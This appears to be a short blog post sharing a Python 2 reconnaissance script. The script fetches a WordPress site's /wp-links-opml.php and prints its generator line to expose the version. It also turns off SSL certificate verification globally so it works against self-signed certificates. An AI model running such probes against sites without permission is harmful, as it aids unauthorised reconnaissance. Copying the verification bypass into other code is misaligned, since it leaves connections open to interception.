Python Script: Retrieve WordPress Admin v2
- by Vince
-
in Blog
-
Hits: 1957
This has less to do with WordPress and more to do with a Python exploit which failed to work because of a self-signed SSL certificate. To keep the solution simple, I decided to rewrite the existing WordPress script and test out the fix. Essentially when a server is using a self-signed SSL certificate and you run the exploit, you're going to see the following error:
urllib2.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:726)>
If you look at the original version of this script, you'll notice I've added five lines which solves this issue:
#!/usr/bin/python
import urllib2
import os
import ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and
getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
print "[*] Target URL format = http://www.mydomain.com"
host = raw_input("[*] Enter target URL: ")
path = '/wp-links-opml.php'
combined = host + path
url = urllib2.urlopen(combined)
print
print ("fetching... ") + combined
html = url.readlines()
for line in html:
if 'generator' in line:
print
print line